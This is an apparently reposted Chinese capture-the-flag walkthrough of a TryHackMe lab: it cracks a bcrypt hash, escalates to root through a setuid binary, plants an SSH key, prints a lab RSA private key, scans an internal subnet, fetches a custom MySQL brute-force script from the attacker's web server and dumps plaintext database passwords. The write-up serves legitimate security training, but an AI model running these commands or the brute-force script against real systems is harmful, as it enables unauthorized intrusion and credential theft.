mprotect(0x401000, 602665, PROT_READ|PROT_EXEC) = 0
mmap(0x495000, 258384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0x95000) = 0x495000
mprotect(0x495000, 258384, PROT_READ)   = 0
mmap(0x4d6000, 21104, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0xd5000) = 0x4d6000
mprotect(0x4d6000, 21104, PROT_READ|PROT_WRITE) = 0
mmap(0x4dc000, 35720, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x4dc000
mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f46cb1ef000
close(3)                                = 0
munmap(0x7f46cb1f0000, 358350)          = 0
brk(NULL)                               = 0xd8b000
brk(0xd8bc40)                           = 0xd8bc40
arch_prctl(ARCH_SET_FS, 0xd8b300)       = 0
uname({sysname="Linux", nodename="kali", ...}) = 0
readlink("/proc/self/exe", "/usr/local/soft/hack/file.bin", 4096) = 29
brk(0xdacc40)                           = 0xdacc40
brk(0xdad000)                           = 0xdad000
mprotect(0x4d6000, 12288, PROT_READ)    = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}) = 0
write(1, "\342\226\221\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\225\227\342\226\221\342\226\210\342\226\210\342\226"..., 247░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
) = 247
write(1, "\342\226\210\342\226\210\342\225\224\342\225\220\342\225\220\342\226\210\342\226\210\342\225\227\342\226\210\342\226\210\342\225"..., 247██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
) = 247
write(1, "\342\226\210\342\226\210\342\225\221\342\226\221\342\226\221\342\225\232\342\225\220\342\225\235\342\226\210\342\226\210\342\226"..., 247██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
) = 247
write(1, "\342\226\210\342\226\210\342\225\221\342\226\221\342\226\221\342\226\210\342\226\210\342\225\227\342\226\210\342\226\210\342\225"..., 247██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
) = 247
write(1, "\342\225\232\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\225\224\342\225\235\342\226\210\342\226\210\342\225"..., 247╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
) = 247
write(1, "\342\226\221\342\225\232\342\225\220\342\225\220\342\225\220\342\225\220\342\225\235\342\226\221\342\225\232\342\225\220\342\225"..., 247░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝
) = 247
write(1, "\n", 1
)                       = 1
exit_group(0)                           = ?
+++ exited with 0 +++

6.3、上面没看出啥,使用更专业的工具解析

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 爆破用时,12分钟
    • 结果为:mike
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# echo '$2b$15$TXl.yuAF49958vsn1dqPfeR9YpyBuWAZrm/dTG5vuG6m3kJkMXWm6' > hash

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mike             (?)     
1g 0:00:12:09 DONE (2023-11-16 07:35) 0.001371g/s 6.319p/s 6.319c/s 6.319C/s pandabear..class08
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

7、提权

www-data@host1:/home/mike$ /home/mike/1cryptupx mike
/home/mike/1cryptupx mike
whoami
www-data
exit
░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝

www-data@host1:/home/mike$ /usr/share/man/zh_TW/crypt mike
/usr/share/man/zh_TW/crypt mike
whoami
root
*SHELL=/bin/bash* script -q /dev/null
root@host1:/home/mike#

7.1、免密登录

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# ssh-keygen -f patrick
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in patrick
Your public key has been saved in patrick.pub
The key fingerprint is:
SHA256:oESz3QQDZBXlmiUP55fw3fSNPf3x3VD6dlt6V2uGj40 root@kali
The key's randomart image is:
+---[RSA 3072]----+
|   .*o=+o        |
|   o + =         |
|    o = *     . .|
|   . . @ o o o *o|
|    . o S + . =o=|
|         .     oO|
|              . %|
|             .+**|
|             E==.|
+----[SHA256]-----+
                                                                                                               
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cp patrick.pub authorized_keys

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# chmod 600 patrick
root@host1:/root/.ssh# echo 'ssh-rsa ......2i5Uempgkcy0Up0LbJbk= root@kali' > authorized_keys
<z2i5Uempgkcy0Up0LbJbk= root@kali' > authorized_keys
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# ssh root@192.168.110.134 -i patrick 
	The authenticity of host '192.168.110.134 (192.168.110.134)' can`t be established.
ED25519 key fingerprint is SHA256:mMbUA2y6p+S0PriDGDheemiz88Jsn8dfextdWlNpZxQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.110.134' (ED25519) to the list of known hosts.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@host1:~#

7.2、信息收集

7.2.1、基础信息收集

root@host1:~# cd /home/mike
root@host1:/home/mike# ls -al
total 384
drwxr-xr-x 5 mike mike   4096 Jul 30  2021 .
drwxr-xr-x 3 root root   4096 Jul 19  2021 ..
lrwxrwxrwx 1 root mike      9 Jul 19  2021 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike    220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 mike mike   3771 Apr  4  2018 .bashrc
drwx------ 2 mike mike   4096 Jul 30  2021 .cache
drwx------ 3 mike mike   4096 Jul 30  2021 .gnupg
-rw-r--r-- 1 mike mike    807 Apr  4  2018 .profile
drwx------ 2 mike mike   4096 Jul 19  2021 .ssh
-rwxr-xr-x 1 mike mike 358668 Jul 30  2021 1cryptupx
root@host1:/home/mike# cd .ssh
root@host1:/home/mike/.ssh# ls -al
total 16
drwx------ 2 mike mike 4096 Jul 19  2021 .
drwxr-xr-x 5 mike mike 4096 Jul 30  2021 ..
-rw------- 1 mike mike 1679 Jul 15  2021 id_rsa
-rw-r--r-- 1 mike mike  392 Jul 15  2021 id_rsa.pub
root@host1:/home/mike/.ssh#
root@host1:/home/mike/.ssh# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAnWmOnLHQfBxrW0W0YuCiTuuGjCMUrISE4hdDMMuZruW6nj+z
YQCmjcL3T4j7v3/ddOBsTgxwi/+ZRZtRqJlvKEevPHJ8cR1DX7mmNyU3w/DRMnrW
djcIozYXVYdmj9v3e8xPbR6ybJX6fKpTuaDVdiwqQAecbvs5tBUkonAYUBuv1nhb
p/6+ZRYWNWv9RXE1XRuhROXD1Kl/tm7z4EcGZEDHu36oka23JJL7vzMeNtAdz3JF
wlGAtXH1cpdNa3+JKl/dBrRjV+YT3YivlqA2z4tRx/sA91RTxEO5oTYEL0bR1cKg
UPf1b21ecna8mpvQnkQmqQe8W9tSSlzVb6jnowIDAQABAoIBAA09O4liSy6lFUJv
8mP+kKgilwZiTPLVkneRjU0lUp+rIq78nJGkBF4X78T4uHO6xV13IqTN1wlvTezU
y2FqxjaVEN/8oQrCc1AxxREOSEpqjq24NyFqL4fKnNvMr4uZ7I60+FktI8SOOKsT
iEcsh8eQn10TRszuxEOpI5Ol6eWSzMPKxuw4ChniJsvaz8IDkYd4O/MDddjgcttb
Wv+LhX7qANPnRzeIDUNG2wmy3U+gxIJno/h3Xec0kVNQ0qwZmr56DO9G1oBbTU+4
6ynpIG2hEbSwGktWmnfw/4O+DZr8NiqeLY10G0MIwFIycuj2QfIF+mY6nqCZPWrH
8Lkf8wECgYEA0PMS/uqxL5u4e+bwSPdtfhEvFxk33/+PWMFIx0c5v7/jwtSW+/0v
YEIDC/DmHh9h4aF8dHMg8x18B50dw0HuLHWIgezNjJ9M8jwQgixRGamc5m6oFWh5
59581KWVIuDFqLG/6DN6cW/QQDo2MrNKP3QADeUPb2jhflzmir0TDLECgYEAwNud
VzZ6ON5YvbJbNh/JltSS1jAqUftzheX/m+3VrjE0iChLGvyP84aY7qpbiXNLHe+3
1/4JPoTljlml2RMTdZjAiF52u6KXwOLx6alGFoSbmAoZYG/4/Z0pwLjcozWGrjYD
03EDPdCclzWFyCqD9pYFGVAvEJuqx3rGYm1x/pMCgYEA0IdWFNwqOsYhBl6CvX9Z
YbBKm7XKQp2s9LnpJSAbLReXebBqgk+6gUk/+yHOto9BQ0nDiAACCT8KshqGQoDA
7tPZiTjIJqgwxatWGmOaCI9yi7IxwzPCPbqYQCyEOwuxl9rVGCqP7zfU0NSHlG/E
ELF3AGby0ZANQuv6FMn/gfECgYEAkjoyK31P4KyeBn8kb35coDNffm2YuP56Ei1Y
yMblPKVsWkyK3dRf5VrJvDSJIUe8zd8Duw6PvcqQL4XDnTq8h26hlQRi7FQU0hiB
KhTB4rL7MqV9pkRgOxOeI9VG3azpCFBGSFypA4aYJIJdhG7QDfijtxS4CtStAYES
yHCJfWcCgYAFzAx6hwi9smlvCpoZ1D8TRyqlxKf4YtSkTl74ZyiRESfvpuZSiclg
mFdVoHOt+gkpsXkmGmuqymIBRYGEw3dJ2C4MRPjx0UFpua0BAZ5k0ly6eaZuejWj
0/AHOf/jOfwvM4G2X0L8yjJqq/5F6NOjf9uxEusphzDcr/I1inuY3A==
-----END RSA PRIVATE KEY-----
  • 尝试爆破「id_rsa」密码
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# ssh2john mike_rsa > id_rsa.hash
mike_rsa has no password!

7.2.2、内网主机发现

  • 发现IP:172.16.20.6
root@host1:~# for i in {1..254} ;do (ping 172.16.20.$i -c 1 -w 5 >/dev/null && echo "172.16.20.$i" &) ;done
172.16.20.2 # 本机
172.16.20.6

7.2.3、端口扫描

root@host1:~# for i in {1..65535};do (echo < /dev/tcp/172.16.20.6/$i) &>/dev/null && printf "\n[+] The Open Port is:%d\n" "$i" ;done

[+] The Open Port is:22

8、越权

root@host1:/home/mike/.ssh# ssh mike@172.16.20.6 -i id_rsa

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Mon Jul 19 20:23:18 2021 from 172.16.20.2
mike@host2:~$

8.1、信息收集

8.1.1、基础信息收集

mike@host2:~$ history
mike@host2:~$ sudo -l
[sudo] password for mike: 
Sorry, try again.
[sudo] password for mike: 
Sorry, try again.
[sudo] password for mike: 
sudo: 3 incorrect password attempts
mike@host2:~$ /usr/sbin/getcap -r / 2>/dev/null
mike@host2:~$ crontab -l
no crontab for mike
mike@host2:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
mike@host2:~$ echo $BASH_VERSION
4.4.20(1)-release
mike@host2:~$

8.1.2、文件信息收集

mike@host2:~$ ls -al
total 32
drwxr-xr-x 5 mike mike 4096 Nov 16 13:25 .
drwxr-xr-x 3 root root 4096 Jul 16  2021 ..
lrwxrwxrwx 1 mike mike    9 Jul 19  2021 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 mike mike 3771 Apr  4  2018 .bashrc
drwx------ 2 mike mike 4096 Nov 16 13:25 .cache
drwx------ 3 mike mike 4096 Nov 16 13:25 .gnupg
-rw-r--r-- 1 mike mike  807 Apr  4  2018 .profile
drwx------ 2 mike mike 4096 Jul 16  2021 .ssh
mike@host2:~$ find / -user root -perm /4000 2>/dev/null
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/mount
/bin/ping
/bin/su
/bin/umount
/bin/fusermount
/bin/ping6
mike@host2:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/mount
/bin/ping
/bin/su
/bin/umount
/bin/fusermount
/bin/ping6

8.1.3、进程信息收集

mike@host2:~$ ss -tulpn
Netid      State        Recv-Q       Send-Q              Local Address:Port             Peer Address:Port      
udp        UNCONN       0            0                   127.0.0.53%lo:53                    0.0.0.0:*         
tcp        LISTEN       0            80                      127.0.0.1:3306                  0.0.0.0:*         
tcp        LISTEN       0            128                 127.0.0.53%lo:53                    0.0.0.0:*         
tcp        LISTEN       0            128                       0.0.0.0:22                    0.0.0.0:*         
tcp        LISTEN       0            128                          [::]:22                       [::]:*         
mike@host2:~$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.4 159400  8452 ?        Ss   06:56   0:01 /sbin/init
root        56  0.0  0.8 127496 16848 ?        Ss   06:56   0:00 /lib/systemd/systemd-journald
root        61  0.0  0.1  42112  3324 ?        Ss   06:56   0:00 /lib/systemd/systemd-udevd
systemd+   137  0.0  0.2  71724  5052 ?        Ss   06:56   0:00 /lib/systemd/systemd-networkd
systemd+   138  0.0  0.2  70496  4604 ?        Ss   06:56   0:00 /lib/systemd/systemd-resolved
message+   156  0.0  0.2  49940  4248 ?        Ss   06:57   0:00 /usr/bin/dbus-daemon --system --address=system
daemon     159  0.0  0.1  28340  2352 ?        Ss   06:57   0:00 /usr/sbin/atd -f
root       160  0.0  0.2  70472  5892 ?        Ss   06:57   0:00 /lib/systemd/systemd-logind
root       162  0.0  0.8 169176 16924 ?        Ssl  06:57   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher 
root       163  0.0  0.1  30112  3112 ?        Ss   06:57   0:00 /usr/sbin/cron -f
root       170  0.0  0.1  14776  2344 ?        Ss+  06:57   0:00 /sbin/agetty -o -p -- \u --noclear --keep-baud
root       182  0.0  0.9 186036 19856 ?        Ssl  06:57   0:00 /usr/bin/python3 /usr/share/unattended-upgrade
root       186  0.0  0.2  72308  5672 ?        Ss   06:57   0:00 /usr/sbin/sshd -D
mysql      227  0.1  8.6 1357980 176648 ?      Sl   06:57   0:30 /usr/sbin/mysqld --daemonize --pid-file=/run/m
root       565  0.0  0.3 103860  7160 ?        Ss   13:32   0:00 sshd: mike [priv]
mike       567  0.0  0.3  76404  7128 ?        Ss   13:32   0:00 /lib/systemd/systemd --user
mike       568  0.0  0.1 109388  2984 ?        S    13:32   0:00 (sd-pam)
mike       625  0.0  0.1 103860  3628 ?        R    13:32   0:00 sshd: mike@pts/0
mike       626  0.0  0.1  20396  3832 pts/0    Ss   13:32   0:00 -bash
mike       648  0.0  0.1  36160  3264 pts/0    R+   13:37   0:00 ps aux

8.2、3306端口 - MySQL

  • mike 用户 可爆破 密码
  • 但是 现有的工具使用不了,于是自己写了一个 sh 脚本
#!/bin/bash

# mysql_login.sh
# 脚本参数
username=$1  # MySQL用户(或字典路径)
password=$2  # MySQL密码(或字典路径)
task_num=$3  # 并发数,默认 32

# 检查参数是否存在
if [ -z "$username" ] || [ -z "$password" ]; then
    echo "请输入用户名(或字典路径)和密码(或字典路径)"
    echo "用法: ./mysql_login.sh username password"
    exit 1
fi
# 并发数,默认 32
if [ -z "$task_num" ]; then
    task_num=32
elif [[ ! $task_num =~ ^[0-9]+$ ]]; then
    task_num=32
fi

# 读取用户字典文件
if [ -f "$username" ]; then
    usernames=$(cat $username)
else
    usernames=$(echo $username | cat)
fi
# 读取密码字典文件
if [ -f "$password" ]; then
    passwords=$(cat $password)
else
    passwords=$(echo $password | cat)
fi

# 尝试登录函数
function try_mysql_login() {
    # 尝试登录MySQL
    output=$(mysql -u $1 -p$2 -e "exit" 2>&1)

    # 检查输出是否包含错误信息
    if [[ ! $output =~ 'ERROR' ]]; then
        echo "成功登录,用户密码为 -> $1 : $2"
        # 获取当前脚本的PID
        script_pid=$(ps -p $$ | grep -v PID | awk '{print $1}')
        # 强制结束当前脚本
        kill -s 9 $script_pid
    fi
}

# 循环遍历密码字典
count=0
for username in $usernames; do
    echo "尝试用户: $username"
    for password in $passwords; do
        count=$((count + 1))
        # 尝试登录MySQL
        try_mysql_login $username $password &
		# 打印进度,如果一直没有输出,时间太长会感觉卡死了
        if [ $((count % $task_num)) -eq 0 ]; then
            if [ $((count % ($task_num * 10))) -eq 0 ]; then
                echo "尝试登录进度 -> $username : $password"
            fi
            wait
        fi
    done
done
echo "密码爆破失败"
exit 1
  • 通过Python启动Web服务,层层传递
python3 -m http.server 5468
mike@host2:/tmp$ mysql -u root -p
Enter password: 
ERROR 1698 (28000): Access denied for user 'root'@'localhost'
mike@host2:/tmp$ mysql -u mike -p
Enter password: 
ERROR 1045 (28000): Access denied for user 'mike'@'localhost' (using password: NO)

mike@host2:/tmp$ wget "http://172.16.20.2:5468/mysql_login.sh"
--2023-11-16 16:56:32--  http://172.16.20.2:5468/mysql_login.sh
Connecting to 172.16.20.2:5468... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1542 (1.5K) [text/x-sh]
Saving to: ‘mysql_login.sh’

mysql_login.sh            100%[====================================>]   1.51K  --.-KB/s    in 0s      

2023-11-16 16:56:32 (197 MB/s) - ‘mysql_login.sh’ saved [1542/1542]

mike@host2:/tmp$ wget "http://172.16.20.2:5468/top500.txt"
--2023-11-16 15:32:53--  http://172.16.20.2:5468/top500.txt
Connecting to 172.16.20.2:5468... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3503 (3.4K) [text/plain]
Saving to: ‘top500.txt’

top500.txt                100%[====================================>]   3.42K  --.-KB/s    in 0s      

2023-11-16 15:32:53 (142 MB/s) - ‘top500.txt’ saved [3503/3503]

mike@host2:/tmp$ chmod +x mysql_login.sh
mike@host2:/tmp$ ./mysql_login.sh mike top500.txt
尝试用户: mike
成功登录,密码为: password

8.3、登录 mysql

mike@host2:/tmp$ mysql -u mike -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 2022
Server version: 5.7.34-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| accounts           |
+--------------------+
2 rows in set (0.03 sec)

mysql> use accounts;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+--------------------+
| Tables_in_accounts |
+--------------------+
| users              |
+--------------------+
1 row in set (0.00 sec)

mysql> select * from users;
+-------+---------------------+
| login | password            |
+-------+---------------------+
| root  | bjsig4868fgjjeog    |
| mike  | WhatAreYouDoingHere |
+-------+---------------------+
2 rows in set (0.00 sec)

mysql> exit;
Bye
mike@host2:/tmp$

9、su 切换 ROOT

  • 刚好使用上面的两个密码
mike@host2:/tmp$ su
Password: 
root@host2:/tmp# cd ~
root@host2:~# ls -al
total 28
drwx------  4 root root 4096 Jul 19  2021 .
drwxr-xr-x 22 root root 4096 Jun 29  2021 ..
lrwxrwxrwx  1 root root    9 Jul 19  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4096 Jul 15  2021 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Jul 15  2021 .ssh
-rw-------  1 root root  218 Jul 16  2021 mike.zip
root@host2:~# unzip mike.zip
Archive:  mike.zip
[mike.zip] mike password: 
 extracting: mike                    
root@host2:~# ls
mike  mike.zip
root@host2:~# cat mike
THM{_Y0U_F0UND_TH3_C0NTA1N3RS_}
root@host2:~#

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1327259.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

文件的查看与管理

目录 一、命令之-----cat &#xff08;一&#xff09;查看文本文件内容 &#xff08;二&#xff09;合并文件内容 &#xff08;三&#xff09;创建文件 &#xff08;四&#xff09;追加内容到文件 二、管道符的作用 三、分页显示 &#xff08;一&#xff09;命令之…

Postgresql源码(118)elog/ereport报错跳转功能分析

1 日志接口 elog.c完成PG中日志的生产、记录工作&#xff0c;对外常用接口如下&#xff1a; 1.1 最常用的ereport和elog ereport(ERROR,(errcode(ERRCODE_UNDEFINED_TABLE),errmsg("relation \"%s\" does not exist",relation->relname)));elog(ERRO…

重塑数字生产力体系,生成式AI将开启云计算未来新十年?

科技云报道原创。 今天我们正身处一个历史的洪流&#xff0c;一个巨变的十字路口。生成式AI让人工智能技术完全破圈&#xff0c;带来了机器学习被大规模采用的历史转折点。 它掀起的新一轮科技革命&#xff0c;远超出我们今天的想象&#xff0c;这意味着一个巨大的历史机遇正…

Hbase的安装配置

注&#xff1a;本文默认已经完成hadoop的下载以及环境配置 1.上传zookeeper和hbase压缩包到指令路径并且解压 (理论上讲&#xff0c;hbase其实内置了zookeeper&#xff0c;我们也可以不另外下载&#xff0c;另外下载的目的在于减少组件间依赖性) cd /home mkir hbase cd /hom…

IDEA 黑色主题很难看到鼠标

“控制面板”—搜索“鼠标”关键字—选择“更改鼠标设置” 参考&#xff1a; IDEA 黑色主题很难看到鼠标

ansible的脚本-----playbook剧本

ansible的脚本-----playbook剧本 playbook组成部分&#xff1a; 1、tasks任务&#xff1a;包含要在目标主机上执行的操作&#xff0c;使用模块定义这些操作。每个任务都是一个模块的调用 2、variables变量&#xff1a;存储和传递数据&#xff0c;变量可以自定义&#xff0c;…

WeakMap 和 WeakSet:解决内存泄漏避免循环引用(上)

&#x1f90d; 前端开发工程师&#xff08;主业&#xff09;、技术博主&#xff08;副业&#xff09;、已过CET6 &#x1f368; 阿珊和她的猫_CSDN个人主页 &#x1f560; 牛客高级专题作者、在牛客打造高质量专栏《前端面试必备》 &#x1f35a; 蓝桥云课签约作者、已在蓝桥云…

React组件状态管理

React组件的状态管理是一个很重要的内容。从字面来理解&#xff0c;按钮是否可单击、图片是否显示等&#xff0c;这些都是状态。广义来讲&#xff0c;React组件的状态还1包括传入React的数据&#xff0c;例如某个组件要展示列表&#xff0c;列表的数据也是该组件的状态。总之&a…

Dynamic Coarse-to-Fine Learning for Oriented Tiny Object Detection(CVPR2023待补)

文章目录 BeginningAbstract挑战方法成果 Introduction引出问题早期的work及存在的问题近期的work及存在的问题our workContribution Related Work&#xff08;paper for me&#xff09;Oriented Object DetectionPrior for Oriented ObjectsLabel Assignment Tiny Object Dete…

【算法】算法题-20231221

这里写目录标题 一、830. 较大分组的位置二、657. 机器人能否返回原点三、771. 宝石与石头 一、830. 较大分组的位置 在一个由小写字母构成的字符串 s 中&#xff0c;包含由一些连续的相同字符所构成的分组。 例如&#xff0c;在字符串 s "abbxxxxzyy"中&#xff0…

【XML】TinyXML 详解

1、简介 优点&#xff1a; TinyXML 是一个简单、小型的 C XML 解析器&#xff0c;可以轻松集成到项目中。 TinyXML 解析 XML 文档&#xff0c;并根据该文档构建可读取、修改和保存的文档对象模型 (DOM) TinyXML 是在 ZLib 许可下发布的&#xff0c;因此可以在开源或商业代码中…

【SQL题目】连续日期的判断

【1.查询至少连续3天下单的用户】 思路1&#xff08;使用lead&#xff09;&#xff1a; distinct user_id,create_date去重&#xff0c;确保每个用户每天只有一条访问记录lead(create_date,2,‘9999-12-31’) over(partition by user_id order by create_date)根据用户分区&am…

模型实战(18)之C++ - tensorRT部署GAN模型实现人脸超分辨重建

模型实战(18)之C++ - tensorRT部署GAN模型实现人脸超分辨重建 一个实现人脸超分辨率重建的demo支持StyleGAN: GPEN or GFPGAN通过C++ - tensorrt 快速部署,推理速度每帧 在RTX3090上5.5ms+,RTX3050上10ms+下边是实现效果(图片来源于网络search,如若侵权,联系删除) 下边…

AI Native工程化:百度App AI互动技术实践

作者 | GodStart 导读 随着AI浪潮的兴起&#xff0c;越来越多的应用都在利用大模型重构业务形态&#xff0c;在设计和优化Prompt的过程中&#xff0c;我们发现整个Prompt测评和优化周期非常长&#xff0c;因此&#xff0c;我们提出了一种Prompt生成、评估与迭代的一体化解决方案…

YashanDB个人版体验总结

前言 YashanDB数据库具有多项功能特性。首先&#xff0c;它是一个分布式数据库&#xff0c;支持水平扩展&#xff0c;能够将数据分散到多个节点上&#xff0c;从而提高系统的可靠性和性能。其次&#xff0c;YashanDB数据库具备高可用性&#xff0c;支持主从复制和自动故障转移…

竞赛保研 基于Django与深度学习的股票预测系统

文章目录 0 前言1 课题背景2 实现效果3 Django框架4 数据整理5 模型准备和训练6 最后 0 前言 &#x1f525; 优质竞赛项目系列&#xff0c;今天要分享的是 &#x1f6a9; **基于Django与深度学习的股票预测系统 ** 该项目较为新颖&#xff0c;适合作为竞赛课题方向&#xff…

VS ASP.Net Core项目还原Packages包到本地(解决服务器没有网无法重新生成的问题)

问题背景 ASP.Net Core MVC项目&#xff0c;无法重新生成。 现场服务器没有网,放上去的代码无法通过nuget还原包到服务器&#xff0c;导致无法编译无法运行。 解决办法 将Packages还原到本机&#xff08;有网&#xff09;&#xff0c;然后再将代码放到服务器运行。 在有网的…

KoPA: Making Large Language Models Perform Better in Knowledge Graph Completion

本来这个论文用来组会讲的&#xff0c;但是冲突了&#xff0c;没怎么讲&#xff0c;记录一下供以后学习。 创新点 按照我的理解简单概述一下这篇论文的创新点 提出使用大模型补全知识图谱&#xff0c;并且融合知识图谱的结构信息提出一个新的模型KoPA模型&#xff0c;采用少…

Excel 获取当前行的行数

ROW() 获取当前行 ROW()1 获取当前行然后支持二次开发

java基础入门-23-【网络编程】

java基础入门-23-【网络编程】 32、网络编程1.什么是网络编程2.网络编程三要素1.1 IP1.2 总结1.3 IPV4的地址分类形式1.4 常见的CMD命令1.5 InetAddress类的使用1.6 端口和协议 2.UDP通信程序2.1 UDP发送数据2.2UDP接收数据2.3UDP通信程序练习2.4UDP三种通讯方式2.5UDP组播实现…